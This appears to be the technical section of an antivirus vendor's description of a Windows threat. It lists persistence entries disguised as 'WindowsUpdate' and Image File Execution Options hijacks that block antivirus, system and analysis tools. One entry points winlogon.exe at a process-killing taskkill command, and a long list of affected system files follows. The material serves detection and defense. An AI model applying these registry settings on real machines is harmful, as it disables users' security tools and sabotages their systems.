Technical Information
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'WindowsUpdate' = '<Full path to file>'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winlogon.exe] 'Debugger' = 'taskkill /f /fi "pid ne 1"'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.msc] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\compmgmt.msc] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dxdiag.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360sd.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rp.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360doctor.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpui.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavstart.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windefend.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kxescore.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kwsprotect64.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kismain.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qqpcrtp.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qqpcmgr.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\qqpctray.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avast.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccsvchst.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcshield.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\processmonitor.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procmon.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tcpview.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ollydbg.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\x64dbg.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windbg.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ida64.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cheatengine-x86_64.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vmware.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\virtualbox.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vboxservice.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sfc.exe] 'Debugger' = '\'
- [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dism.exe] 'Debugger' = '\'
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsupdate.exe
- <SYSTEM32>\tasks\windowsupdate
- [HKLM\System\CurrentControlSet\Services\WindowsUpdate] 'Start' = '00000002'
- [HKLM\System\CurrentControlSet\Services\WindowsUpdate] 'ImagePath' = '<Full path to file>'
- 'WindowsUpdate' <Full path to file>
- %WINDIR%\explorer.exe
- %WINDIR%\cm.exe
- %WINDIR%\ta.exe
- <SYSTEM32>\config\bcd-template
- <SYSTEM32>\config\bcd-template.log
- <SYSTEM32>\config\components
- <DRIVERS>\1394bus.sys
- <SYSTEM32>\config\components.log
- <DRIVERS>\1394ohci.sys
- <SYSTEM32>\config\components.log1
- <DRIVERS>\acpi.sys
- <SYSTEM32>\config\components.log2
- <SYSTEM32>\config\components{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf
- <SYSTEM32>\config\components{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms
- <SYSTEM32>\config\components{016888b9-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms
- <DRIVERS>\acpipmi.sys
- <DRIVERS>\adp94xx.sys
- <SYSTEM32>\config\default.log
- <DRIVERS>\adpahci.sys
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.001
- <SYSTEM32>\wbem\aaclient.mof
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.002
- <SYSTEM32>\wbem\auditrsop.mof
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.003
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.004
- <SYSTEM32>\wbem\authfwcfg.mof
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.005
- <SYSTEM32>\wbem\autorecover\00fa62e01ce538c858bc24f9b40a9d03.mof
- <SYSTEM32>\winevt\logs\debugchannel.etl
- <SYSTEM32>\winevt\logs\microsoft-windows-application-experience%4problem-steps-recorder.evtx
- <SYSTEM32>\winevt\logs\microsoft-windows-application-experience%4program-compatibility-assistant.evtx
- <SYSTEM32>\winevt\logs\microsoft-windows-application-experience%4program-compatibility-troubleshooter.evtx
- <SYSTEM32>\winevt\logs\microsoft-windows-application-experience%4program-inventory.evtx
- <SYSTEM32>\winevt\logs\microsoft-windows-application-experience%4program-telemetry.evtx
- <SYSTEM32>\aaclient.dll
- <SYSTEM32>\accessibilitycpl.dll
- %WINDIR%\syswow64\12520437.cpx
- <SYSTEM32>\winevt\logs\microsoft-windows-branchcachesmb%4operational.evtx
- <SYSTEM32>\winevt\logs\microsoft-windows-capi2%4operational.evtx
- <SYSTEM32>\acctres.dll
- %WINDIR%\syswow64\12520850.cpx
- <SYSTEM32>\logfiles\scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
- %WINDIR%\syswow64\aaclient.dll
- <SYSTEM32>\acledit.dll
- <SYSTEM32>\aclui.dll
- <SYSTEM32>\acppage.dll
- <SYSTEM32>\acproxy.dll
- %WINDIR%\syswow64\accessibilitycpl.dll
- %WINDIR%\syswow64\acctres.dll
- <SYSTEM32>\logfiles\scm\07661894-0d8c-4c78-a39c-b5395c6f2406
- <SYSTEM32>\actioncenter.dll
- %WINDIR%\syswow64\acledit.dll
- <SYSTEM32>\actioncentercpl.dll
- %WINDIR%\syswow64\aclui.dll
- <SYSTEM32>\logfiles\scm\088482fa-65b8-4e17-9abf-1dcd48e8d373
- <SYSTEM32>\logfiles\scm\09f06bfe-a3c8-40e3-846a-6e6f4000c238
- <SYSTEM32>\logfiles\scm\0cbcd260-e721-48a6-b134-4553c55ee76c
- <SYSTEM32>\logfiles\scm\12a7bd92-5a8a-4b3f-875a-97b517afabef
- <SYSTEM32>\logfiles\scm\1f08c991-d7c2-40f3-a40f-dd84bf6b2afa
- <SYSTEM32>\logfiles\scm\1f7b7221-ae8f-44f3-ba82-f7d260f51964
- <SYSTEM32>\logfiles\scm\2470470f-2634-478e-b181-571e98a789bb
- <SYSTEM32>\logfiles\scm\28011108-68df-4c73-b91b-57427d501bba
- <SYSTEM32>\logfiles\scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
- <SYSTEM32>\logfiles\scm\353af41b-7f4c-407b-aeb4-b58f9c728fea
- <SYSTEM32>\logfiles\scm\3e6a0d0b-eb6a-44e6-8324-5727c1a23f1e
- <SYSTEM32>\logfiles\scm\3edd3d54-583f-4cd6-bb20-2920e8000bf3
- <SYSTEM32>\logfiles\scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
- <SYSTEM32>\logfiles\scm\47ff5b8e-9fee-4d44-b106-ead1e52bd6dd
- <SYSTEM32>\logfiles\scm\486d715e-6aa2-44cf-bc48-b6990cbb53c6
- <SYSTEM32>\logfiles\scm\4c8b01a2-11ff-4c41-848f-508ef4f00cf7
- <SYSTEM32>\actionqueue.dll
- <SYSTEM32>\activeds.dll
- <SYSTEM32>\activeds.tlb
- <SYSTEM32>\actxprxy.dll
- <SYSTEM32>\adaptertroubleshooter.exe
- <SYSTEM32>\config\sam.log
- <DRIVERS>\adpu320.sys
- <SYSTEM32>\logfiles\scm\533aead3-a324-4ba5-b0fb-ad71e14dffed
- <SYSTEM32>\admparse.dll
- <SYSTEM32>\admtmpl.dll
- <SYSTEM32>\adprovider.dll
- <SYSTEM32>\adsldp.dll
- <SYSTEM32>\adsldpc.dll
- <DRIVERS>\afd.sys
- <DRIVERS>\agilevpn.sys
- <SYSTEM32>\adsmsext.dll
- <SYSTEM32>\logfiles\scm\5a40e926-9e86-4b89-9cfd-b12311724371
- <SYSTEM32>\adsnt.dll
- <SYSTEM32>\adtschema.dll
- <DRIVERS>\agp440.sys
- <SYSTEM32>\advancedinstallers\cmiadapter.dll
- <SYSTEM32>\logfiles\scm\5b42dd9c-5a26-4f27-bb95-34603f0997e5
- <SYSTEM32>\advancedinstallers\cmitrust.dll
- <SYSTEM32>\logfiles\scm\5c0aeeea-c154-45be-8499-bea5f11baff6
- <SYSTEM32>\wbem\autorecover\01904bd65f4b4613a12d77f7371d3676.mof
- <SYSTEM32>\logfiles\scm\5f5a18eb-dc73-4e45-a11c-b59043598412
- %WINDIR%\syswow64\acppage.dll
- %WINDIR%\syswow64\actioncenter.dll
- <DRIVERS>\aliide.sys
- <SYSTEM32>\logfiles\scm\60b89c3c-f910-4bbb-a669-e791f71e2055
- <SYSTEM32>\logfiles\scm\60c539da-c9e9-40cf-92b3-5ea73d096308
- <SYSTEM32>\logfiles\scm\613612ba-897d-44ce-8dc1-8fc283f9fd51
- <SYSTEM32>\logfiles\scm\6738ba6e-ea75-4b6b-b8b8-71f0336dd8ef
- <SYSTEM32>\logfiles\scm\67803909-3e4a-4e4f-8658-3733e0fcfb33
- <SYSTEM32>\logfiles\scm\6c8a3628-4f67-4c3d-851b-65214dd1e03b
- <SYSTEM32>\logfiles\scm\71db46df-93ca-495f-af07-975a16543aa0
- <SYSTEM32>\logfiles\scm\71f4f426-e3c1-4db2-94c3-78030849e4df
- <SYSTEM32>\logfiles\scm\72db7465-bc54-491b-a92a-4637a28c9bbf
- <SYSTEM32>\logfiles\scm\745fbd4e-49d4-439d-8439-b7787fe30fc3
- <SYSTEM32>\logfiles\scm\753c47ae-ec5e-44b3-95a9-2c8e553f0e39
- <SYSTEM32>\logfiles\scm\7afcc0ca-7121-422a-ab45-b0e8d599ff08
- <SYSTEM32>\logfiles\scm\81540b9f-b5bf-47eb-9c95-be195bf2c664
- <SYSTEM32>\logfiles\scm\819fb65c-5f58-45db-bc5f-5091570bcfd4
- <SYSTEM32>\logfiles\scm\881e8f37-5233-4121-9944-c264db6511a4
- <SYSTEM32>\logfiles\scm\8f668034-0d00-485b-9f11-19f909a8714e
- <SYSTEM32>\logfiles\scm\9435f817-fed2-454e-88cd-7f78fda62c48
- <SYSTEM32>\logfiles\scm\9456cb5e-e365-4c64-a6b9-b201f676244b
- <SYSTEM32>\logfiles\scm\967cd2b4-79e2-4983-84cf-256050c36e00
- <DRIVERS>\amdide.sys
- <DRIVERS>\amdk8.sys
- <SYSTEM32>\advancedinstallers\cmiv2.dll
- <SYSTEM32>\config\security.log
- <SYSTEM32>\logfiles\scm\994c86ad-a929-4b2c-88a0-4e25a107a029
- <SYSTEM32>\advancedinstallers\cntrtextinstaller.dll
- <SYSTEM32>\logfiles\scm\9979cb83-103a-4105-9e5d-c74b0af6d198
- <DRIVERS>\amdppm.sys
- <DRIVERS>\amdsata.sys
- <DRIVERS>\amdsbs.sys
- <DRIVERS>\amdxata.sys
- <DRIVERS>\appid.sys
- <DRIVERS>\arc.sys
- <DRIVERS>\arcsas.sys
- <DRIVERS>\asyncmac.sys
- <DRIVERS>\atapi.sys
- <DRIVERS>\ataport.sys
- <DRIVERS>\b57nd60a.sys
- <DRIVERS>\battc.sys
- <DRIVERS>\beep.sys
- <DRIVERS>\blbdrive.sys
- <DRIVERS>\bowser.sys
- <DRIVERS>\brfiltlo.sys
- <DRIVERS>\brfiltup.sys
- <DRIVERS>\bridge.sys
- <SYSTEM32>\advancedinstallers\locdrv.dll
- <DRIVERS>\brserid.sys
- <SYSTEM32>\logfiles\scm\99daefab-47a6-454c-881e-7120818a7584
- <DRIVERS>\brserwdm.sys
- <DRIVERS>\brusbmdm.sys
- <DRIVERS>\brusbser.sys
- <DRIVERS>\bthmodem.sys
- <DRIVERS>\bxvbda.sys
- <DRIVERS>\cdfs.sys
- <DRIVERS>\cdrom.sys
- <DRIVERS>\circlass.sys
- <DRIVERS>\classpnp.sys
- <DRIVERS>\cmbatt.sys
- <DRIVERS>\cmdide.sys
- <DRIVERS>\cng.sys
- <DRIVERS>\compbatt.sys
- <DRIVERS>\compositebus.sys
- <SYSTEM32>\logfiles\scm\a35bb7a6-5f0c-4c9f-8450-2b3bed532d51
- <SYSTEM32>\logfiles\scm\a48cabbf-24c8-4b87-b00f-9261807c3b43
- <SYSTEM32>\logfiles\scm\a6af9377-77ce-47ab-ad7d-ec32cad0c82d
- <SYSTEM32>\logfiles\scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
- <SYSTEM32>\logfiles\scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
- <SYSTEM32>\logfiles\scm\ac668097-4d6b-4093-ac14-014c09dbf820
- <SYSTEM32>\logfiles\scm\b0cbab43-44fc-469b-a4ce-87426761fdce
- <SYSTEM32>\logfiles\scm\b334e8fb-27a2-4a47-9830-e2139e2112c5
- <SYSTEM32>\logfiles\scm\b47ee5e9-ecf3-4f99-82b9-dd229a8e6027
- <SYSTEM32>\logfiles\scm\b616d92b-b299-4008-8130-c769ca9c56ac
- <SYSTEM32>\logfiles\scm\be669c13-8165-4536-96d0-6d6c39292aae
- <SYSTEM32>\logfiles\scm\c016366b-7126-46ca-b36b-592a3d95a60b
- <SYSTEM32>\logfiles\scm\c300eecf-4ffe-467e-8bb7-4db364661292
- <SYSTEM32>\logfiles\scm\c709600f-be47-45dc-b0f2-de3f1aae4f90
- <SYSTEM32>\logfiles\scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e
- <SYSTEM32>\logfiles\scm\cb3d64bf-c0c9-45ff-bfb0-ff1a8f680186
- <SYSTEM32>\logfiles\scm\cb72acc5-fb08-4638-be59-514f085deb1a
- <SYSTEM32>\logfiles\scm\cee64558-e1a7-4d9d-80a7-2001912be5b5
- <SYSTEM32>\logfiles\scm\d0250f3f-6480-484f-b719-42f659ac64d5
- <SYSTEM32>\logfiles\scm\d7b6e81d-3cf4-432c-84d2-24213f4316e6
- <SYSTEM32>\logfiles\scm\da41de71-8431-42fb-9db0-eb64a961dead
- <SYSTEM32>\logfiles\scm\dd9f510c-95f4-499a-90c8-bac5bc372ff4
- <SYSTEM32>\logfiles\scm\e22a8667-f75b-4ba9-ba46-067ed4429de8
- <SYSTEM32>\logfiles\scm\e3163c33-301d-4730-a266-5518c5ed3967
- <SYSTEM32>\logfiles\scm\e3a11aaf-9e68-468f-8b8d-a6ca53cd2fa9
- <SYSTEM32>\logfiles\scm\e513b2a8-1e55-4e5b-916f-f8023522e643
- <SYSTEM32>\logfiles\scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
- <SYSTEM32>\logfiles\scm\eb02381f-d652-4b1c-894a-712498c62c51
- <SYSTEM32>\logfiles\scm\eb250a82-0d1c-4945-8adc-436daadbb391
- <SYSTEM32>\logfiles\scm\f528b413-928b-4233-bdc3-4f9dd41d8a69
- <SYSTEM32>\logfiles\scm\f7c6f720-8015-4fdb-83de-7e32f58bfaca
- <SYSTEM32>\logfiles\scm\fa2bc0a6-8d4b-458a-85c8-2b8c72487513
- <SYSTEM32>\logfiles\scm\fb3c354d-297a-4eb2-9b58-090f6361906b
- <SYSTEM32>\logfiles\scm\fdd56c73-f0d5-41b6-b767-6effd7966428
- <SYSTEM32>\logfiles\scm\scm.evm
- <SYSTEM32>\logfiles\scm\scm.evm.1
- <DRIVERS>\crashdmp.sys
- <DRIVERS>\crcdisk.sys
- <DRIVERS>\csc.sys
- <DRIVERS>\dfsc.sys
- <DRIVERS>\discache.sys
- <DRIVERS>\disk.sys
- <DRIVERS>\diskdump.sys
- <DRIVERS>\dmvsc.sys
- <DRIVERS>\drmk.sys
- <DRIVERS>\drmkaud.sys
- <DRIVERS>\dumpata.sys
- <DRIVERS>\dumpfve.sys
- <DRIVERS>\dxapi.sys
- <DRIVERS>\dxg.sys
- <DRIVERS>\dxgkrnl.sys
- <SYSTEM32>\logfiles\scm\scm.evm.2
- <SYSTEM32>\logfiles\scm\scm.evm.3
- <SYSTEM32>\logfiles\scm\scm.evm.4
- <SYSTEM32>\advancedinstallers\oemhelpins.dll
- <DRIVERS>\dxgmms1.sys
- <DRIVERS>\e1g6032e.sys
- <DRIVERS>\elxstor.sys
- <DRIVERS>\en-us\1394ohci.sys.mui
- <DRIVERS>\en-us\acpi.sys.mui
- <DRIVERS>\en-us\afd.sys.mui
- <DRIVERS>\en-us\agp440.sys.mui
- <DRIVERS>\en-us\amdide.sys.mui
- <DRIVERS>\en-us\amdk8.sys.mui
- <DRIVERS>\en-us\amdppm.sys.mui
- <DRIVERS>\en-us\ataport.sys.mui
- <DRIVERS>\en-us\atikmdag.sys.mui
- <DRIVERS>\en-us\battc.sys.mui
- <SYSTEM32>\wbem\autorecover\01907e88f4e87effb5d2b743ed4a9e09.mof
- <DRIVERS>\en-us\bfe.dll.mui
- <SYSTEM32>\logfiles\sqm\sqmlogger.etl.001
- <SYSTEM32>\wbem\autorecover\01c98101b8a73afcfa88a9b224aac41e.mof
- <SYSTEM32>\advapi32.dll
- <SYSTEM32>\advpack.dll
- <SYSTEM32>\aecache.dll
- <SYSTEM32>\aeevts.dll
- <SYSTEM32>\aeinv.dll
- <SYSTEM32>\aelupsvc.dll
- <SYSTEM32>\aepdu.dll
- <SYSTEM32>\aepic.dll
- <SYSTEM32>\aitagent.exe
- <SYSTEM32>\alg.exe
- <SYSTEM32>\alttab.dll
- <SYSTEM32>\amcompat.tlb
- <SYSTEM32>\amstream.dll
- <SYSTEM32>\amxread.dll
- <SYSTEM32>\apds.dll
- <SYSTEM32>\api-ms-win-core-console-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-datetime-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-debug-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-delayload-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-errorhandling-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-fibers-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-file-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-file-l1-2-0.dll
- <SYSTEM32>\api-ms-win-core-file-l2-1-0.dll
- <SYSTEM32>\api-ms-win-core-handle-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-heap-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-interlocked-l1-1-0.dll
- <DRIVERS>\en-us\brparwdm.sys.mui
- <SYSTEM32>\api-ms-win-core-io-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-libraryloader-l1-1-0.dll
- <DRIVERS>\en-us\brserib.sys.mui
- <SYSTEM32>\logfiles\sqm\sqmlogger.etl.002
- <SYSTEM32>\logfiles\sqm\sqmlogger.etl.003
- <SYSTEM32>\logfiles\sqm\sqmlogger.etl.004
- <SYSTEM32>\logfiles\sqm\sqmlogger.etl.005
- <SYSTEM32>\logfiles\sqm\sqmlogger.etl.009
- <SYSTEM32>\logfiles\sqm\sqmlogger.etl.010
- <SYSTEM32>\logfiles\wmi\rtbackup\etwrtdiaglog.etl
- <SYSTEM32>\logfiles\wmi\rtbackup\etwrteventlog-application.etl
- <SYSTEM32>\logfiles\wmi\rtbackup\etwrteventlog-security.etl
- <SYSTEM32>\logfiles\wmi\rtbackup\etwrteventlog-system.etl
- <SYSTEM32>\logfiles\wmi\rtbackup\etwrtubpm.etl
- <SYSTEM32>\logfiles\wmi\terminal-services-core.etl
- <SYSTEM32>\winevt\logs\microsoft-windows-known folders api service.evtx
- <SYSTEM32>\winevt\logs\microsoft-windows-mui%4admin.evtx
- <SYSTEM32>\winevt\logs\microsoft-windows-mui%4operational.evtx
- <SYSTEM32>\api-ms-win-core-localization-l1-1-0.dll
- <DRIVERS>\en-us\brserid.sys.mui
- <DRIVERS>\en-us\bthenum.sys.mui
- <SYSTEM32>\winevt\logs\microsoft-windows-offlinefiles%4operational.evtx
- <DRIVERS>\en-us\bthpan.sys.mui
- <SYSTEM32>\config\software.log
- <SYSTEM32>\api-ms-win-core-localization-l1-2-0.dll
- <SYSTEM32>\winevt\logs\microsoft-windows-printservice%4admin.evtx
- <SYSTEM32>\winevt\logs\microsoft-windows-readyboost%4operational.evtx
- <DRIVERS>\en-us\bthport.sys.mui
- <SYSTEM32>\winevt\logs\microsoft-windows-restartmanager%4operational.evtx
- <DRIVERS>\en-us\bthusb.sys.mui
- <DRIVERS>\en-us\cdrom.sys.mui
- <DRIVERS>\en-us\disk.sys.mui
- <SYSTEM32>\winevt\logs\microsoft-windows-windows defender%4operational.evtx
- <DRIVERS>\en-us\dot4usb.sys.mui
- <DRIVERS>\en-us\fltmgr.sys.mui
- <DRIVERS>\en-us\fvevol.sys.mui
- <DRIVERS>\en-us\gagp30kx.sys.mui
- <SYSTEM32>\winevt\logs\microsoft-windows-windowssystemassessmenttool%4operational.evtx
- <DRIVERS>\en-us\hdaudbus.sys.mui
- <DRIVERS>\en-us\hdaudio.sys.mui
- <DRIVERS>\en-us\hidbth.sys.mui
- <DRIVERS>\en-us\http.sys.mui
- <DRIVERS>\en-us\i8042prt.sys.mui
- <SYSTEM32>\winevt\logs\setup.evtx
- <DRIVERS>\en-us\intelppm.sys.mui
- <DRIVERS>\en-us\ipmidrv.sys.mui
- <DRIVERS>\en-us\ipnat.sys.mui
- <DRIVERS>\en-us\isapnp.sys.mui
- <DRIVERS>\en-us\kbdclass.sys.mui
- <SYSTEM32>\logfiles\wmi\terminal-services-ip-virtualization.etl
- <SYSTEM32>\logfiles\wmi\terminal-services-rpc-client.etl
- <SYSTEM32>\logfiles\wmi\terminal-services-sessionenv.etl
- <SYSTEM32>\logfiles\wmi\terminal-services-unified-apis.etl
- <DRIVERS>\en-us\kbdhid.sys.mui
- <SYSTEM32>\logfiles\wudf\wudftrace.etl
- %WINDIR%\syswow64\actioncentercpl.dll
- %WINDIR%\syswow64\activeds.dll
- %WINDIR%\syswow64\activeds.tlb
- <DRIVERS>\en-us\luafv.sys.mui
- <DRIVERS>\en-us\modem.sys.mui
- <DRIVERS>\en-us\mouclass.sys.mui
- <SYSTEM32>\api-ms-win-core-localregistry-l1-1-0.dll
- <DRIVERS>\en-us\mouhid.sys.mui
- <DRIVERS>\en-us\mountmgr.sys.mui
- <DRIVERS>\en-us\mpio.sys.mui
- <DRIVERS>\en-us\msdsm.sys.mui
- <DRIVERS>\en-us\mssmbios.sys.mui
- <DRIVERS>\en-us\mtconfig.sys.mui
- <DRIVERS>\en-us\ndis.sys.mui
- <SYSTEM32>\api-ms-win-core-memory-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-misc-l1-1-0.dll
- <DRIVERS>\en-us\ndiscap.sys.mui
- <DRIVERS>\en-us\ndisuio.sys.mui
- <DRIVERS>\en-us\ntfs.sys.mui
- <DRIVERS>\en-us\nv_agp.sys.mui
- <DRIVERS>\en-us\nwifi.sys.mui
- <DRIVERS>\en-us\ohci1394.sys.mui
- <DRIVERS>\en-us\pacer.sys.mui
- <DRIVERS>\en-us\parport.sys.mui
- <DRIVERS>\en-us\partmgr.sys.mui
- <DRIVERS>\en-us\pci.sys.mui
- <DRIVERS>\en-us\pcmcia.sys.mui
- <DRIVERS>\en-us\pnpmem.sys.mui
- <DRIVERS>\en-us\portcls.sys.mui
- <DRIVERS>\en-us\processr.sys.mui
- <DRIVERS>\en-us\pscr.sys.mui
- <DRIVERS>\en-us\qwavedrv.sys.mui
- <DRIVERS>\en-us\rdbss.sys.mui
- <DRIVERS>\en-us\rdpwd.sys.mui
- <DRIVERS>\en-us\rdvgkmd.sys.mui
- <DRIVERS>\en-us\rndismp.sys.mui
- <DRIVERS>\en-us\rndismp6.sys.mui
- <DRIVERS>\en-us\rndismpx.sys.mui
- <DRIVERS>\en-us\scfilter.sys.mui
- <DRIVERS>\en-us\scsiport.sys.mui
- <DRIVERS>\en-us\serial.sys.mui
- <DRIVERS>\en-us\sermouse.sys.mui
- <DRIVERS>\en-us\serscan.sys.mui
- <DRIVERS>\en-us\srv.sys.mui
- <DRIVERS>\en-us\tcpip.sys.mui
- <DRIVERS>\en-us\tpm.sys.mui
- <DRIVERS>\en-us\tsusbflt.sys.mui
- <DRIVERS>\en-us\tsusbhub.sys.mui
- <DRIVERS>\en-us\tunnel.sys.mui
- <DRIVERS>\en-us\uagp35.sys.mui
- <SYSTEM32>\wbem\autorecover\0209c3022c5eb8b33b6483d315298bfb.mof
- <DRIVERS>\en-us\uliagpkx.sys.mui
- <DRIVERS>\en-us\umbus.sys.mui
- %WINDIR%\syswow64\actxprxy.dll
- <DRIVERS>\en-us\usbhub.sys.mui
- <DRIVERS>\en-us\usbport.sys.mui
- <DRIVERS>\en-us\usbrpm.sys.mui
- <DRIVERS>\en-us\vdrvroot.sys.mui
- <DRIVERS>\en-us\vhdmp.sys.mui
- <DRIVERS>\en-us\volmgrx.sys.mui
- <SYSTEM32>\api-ms-win-core-namedpipe-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-processenvironment-l1-1-0.dll
- <SYSTEM32>\api-ms-win-core-processthreads-l1-1-0.dll
- <DRIVERS>\en-us\volsnap.sys.mui
- <DRIVERS>\en-us\vwifibus.sys.mui
- <DRIVERS>\en-us\wacompen.sys.mui
- <DRIVERS>\en-us\wd.sys.mui
